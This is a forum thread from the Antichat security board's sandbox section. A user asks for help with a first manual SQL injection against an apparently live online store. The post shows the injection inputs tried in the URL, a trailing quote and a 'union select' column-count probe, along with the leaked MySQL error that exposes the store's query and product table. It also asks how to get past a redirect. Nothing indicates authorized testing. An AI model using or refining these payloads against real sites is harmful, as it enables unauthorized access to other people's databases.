HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.12.2016, 15:35
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию

помогите крутануть sql,пробую руками)(впервые).Но вот тут то не задача при добавлении в адресную строку любой буквы или цифры происходит редикет на гл.страницу.

пробую так:

site/test/1'.htm

выходит ошибка

Код:
Error: syntax: select sql_no_cache id,ts,category_id,name,generic_name,bestseller,bestseller_weight, ((pricePerItem/100)*-6)+pricePerItem AS pricePerItem, type_de AS type, shortDescription_de AS shortDescription, productDescription_de AS productDescription, safetyInformation_de AS safetyInformation, sideEffects_de AS sideEffects FROM store_products WHERE name LIKE '1' union select sql_no_cache 1,2,3,4,5,6,7' LIMIT 1 -You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 7
если так

site/test/1 union select 1,2,3,4,5,6,7.htm

редикет
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.